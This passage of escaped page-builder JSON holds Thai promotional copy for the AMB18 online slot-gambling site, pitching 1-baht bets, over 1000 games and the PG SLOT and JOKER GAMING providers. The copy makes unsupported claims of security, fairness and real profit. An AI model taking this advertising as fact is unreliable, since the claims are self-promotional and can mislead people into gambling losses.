\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e23\\u0e27\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e2a\\u0e4c\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22 \\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 1 \\u0e1a\\u0e32\\u0e17 \\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e14\\u0e31\\u0e07 \\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e01\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e23\\u0e27\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 1 \\u0e1a\\u0e32\\u0e17 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e19\\u0e35\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 \\u0e41\\u0e2b\\u0e25\\u0e48\\u0e07\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e40\\u0e22\\u0e2d\\u0e30\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e2b\\u0e19\\u0e31\\u0e01 2025 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e1b\\u0e35\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32 1000 \\u0e2b\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01 \\u0e27\\u0e34\\u0e14\\u0e35\\u0e42\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e41\\u0e25\\u0e30\\u0e40\\u0e01\\u0e21\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29<\\/span><span style=\\\"font-weight: 400;\\\">\\u0e17\\u0e35\\u0e48\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 <\\/span><\\/p><p><span style=\\\"font-weight: 400;\\\">\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e34\\u0e2a\\u0e23\\u0e30\\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e32\\u0e27\\u0e1a\\u0e2d\\u0e22\\u0e2a\\u0e38\\u0e14\\u0e14\\u0e38\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e14 \\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e2a\\u0e23\\u0e23\\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e43\\u0e1a\\u0e2d\\u0e19\\u0e38\\u0e0d\\u0e32\\u0e15\\u0e16\\u0e39\\u0e01\\u0e15\\u0e49\\u0e2d\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e15\\u0e34\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e38\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e23\\u0e47\\u0e27\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e17\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e19\\u0e47\\u0e15\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-3-1-1.webp\",\"id\":353,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"AMB18 \\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 \\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\n\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32<\\/span> <span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e14\\u0e31\\u0e07\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49 <\\/span><b>\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e27\\u0e47\\u0e1a \\u0e15\\u0e23\\u0e07 \\u0e41\\u0e15\\u0e01 \\u0e07\\u0e48\\u0e32\\u0e22 \\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e1a\\u0e23\\u0e27\\u0e21\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e08\\u0e32\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e21\\u0e32\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e38\\u0e48\\u0e19\\u0e27\\u0e32\\u0e22 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e23\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22 \\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e08\\u0e31\\u0e14\\u0e08\\u0e49\\u0e32\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e16\\u0e35\\u0e48 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e0b\\u0e34\\u0e23\\u0e4c\\u0e1f\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e27\\u0e2d\\u0e23\\u0e4c\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e17\\u0e35\\u0e48\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e08\\u0e36\\u0e07\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e25\\u0e48\\u0e32\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"933afcf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 PG SLOT<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e04\\u0e48\\u0e32\\u0e22\\u0e22\\u0e2d\\u0e14\\u0e19\\u0e34\\u0e22\\u0e21\\u0e17\\u0e35\\u0e48\\u0e02\\u0e32\\u0e14\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e04\\u0e37\\u0e2d PG SLOT \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e2d\\u0e25\\u0e31\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e21\\u0e35\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e41\\u0e25\\u0e30\\u0e15\\u0e31\\u0e27\\u0e04\\u0e39\\u0e13\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e15\\u0e38\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e2d\\u0e31\\u0e15\\u0e23\\u0e32\\u0e01\\u0e32\\u0e23\\u0e08\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e14\\u0e38\\u0e25 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e16\\u0e36\\u0e07\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e17\\u0e32\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e25\\u0e34\\u0e02\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e41\\u0e17\\u0e49\\u0e08\\u0e36\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e43\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e\\u0e41\\u0e25\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21 JOKER GAMING<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">JOKER GAMING \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e32\\u0e22\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e08\\u0e31\\u0e01\\u0e01\\u0e31\\u0e19\\u0e14\\u0e35\\u0e43\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e18\\u0e35\\u0e21\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e41\\u0e19\\u0e27\\u0e40\\u0e2d\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e15\\u0e30\\u0e27\\u0e31\\u0e19\\u0e15\\u0e01\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15